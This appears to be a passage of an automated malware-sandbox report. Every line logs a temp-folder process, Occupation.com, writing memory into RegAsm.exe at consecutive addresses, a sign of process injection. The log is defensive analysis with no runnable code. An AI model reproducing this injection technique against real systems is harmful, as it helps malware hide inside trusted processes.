Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960E10
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960E74
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960ED8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960F3C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960FA0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961004
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961068
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9610CC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961130
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961194
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9611F8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96125C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9612C0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961324
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961388
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9613EC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961450
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9614B4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961518
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96157C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9615E0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961644
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9616A8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96170C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961770
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9617D4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961838
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96189C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961900
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961964
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9619C8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961A2C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961A90
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961AF4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961B58
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961BBC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961C20
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961C84
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961CE8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961D4C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961DB0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961E14
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961E78
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961EDC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961F40
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961FA4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962008
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96206C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9620D0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962134
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962198
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9621FC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962260
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9622C4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962328
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96238C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9623F0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962454
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9624B8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96251C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962580
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9625E4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962648
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9626AC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962710
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962774
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9627D8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96283C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9628A0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962904
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962968
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9629CC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962A30
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962A94
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962AF8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962B5C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962BC0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962C24
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962C88
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962CEC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962D50
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962DB4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962E18
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962E7C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962EE0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962F44
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962FA8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96300C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963070
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9630D4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963138
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96319C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963200
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963264
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9632C8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96332C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963390
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9633F4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963458
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9634BC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963520
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963584
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9635E8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96364C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9636B0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963714
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963778
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9637DC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963840
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9638A4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963908
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96396C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9639D0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963A34
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963A98
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963AFC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963B60
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963BC4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963C28
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963C8C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963CF0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963D54
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963DB8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963E1C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963E80
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963EE4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963F48
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 963FAC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964010
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964074
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9640D8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96413C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9641A0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964204
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964268
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9642CC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964330
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964394
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9643F8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96445C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9644C0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964524
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964588
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9645EC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964650
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9646B4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964718
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96477C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9647E0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964844
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9648A8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96490C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964970
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9649D4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964A38
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964A9C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964B00
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964B64
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964BC8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964C2C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964C90
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964CF4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964D58
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964DBC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964E20
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964E84
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964EE8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964F4C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 964FB0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965014
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965078
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9650DC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965140
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9651A4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965208
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96526C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9652D0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965334
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965398
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9653FC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965460
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9654C4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965528
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96558C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9655F0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965654
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9656B8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96571C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965780
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9657E4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965848
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9658AC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965910
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965974
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9659D8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965A3C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965AA0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965B04
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965B68
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965BCC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965C30
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 965C94
